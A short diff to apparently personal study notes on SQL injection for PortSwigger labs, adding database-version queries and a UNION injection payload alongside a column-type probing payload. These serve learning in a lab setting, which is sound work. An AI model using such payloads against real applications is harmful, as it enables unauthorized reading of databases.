hackerbytrade/Hacker-Docs/PortSwigger/SQL Injection/sql.md

 ' UNION SELECT NULL,NULL,NULL,'a'--

 If the data type of a column is not compatible with string data, the injected query will cause a database error

+# Database Version
+The queries to determine the database version for some popular database types are as follows:

+Database type	Query
+Microsoft, MySQL	`SELECT @@version`
+Oracle	`SELECT * FROM v$version`
+PostgreSQL	`SELECT version()`
+For example, you could use a UNION attack with the following input:

+' UNION SELECT @@version--
 ============================================
 ============================================
 Lab: SQL injection UNION attack, determining the number of columns returned by the query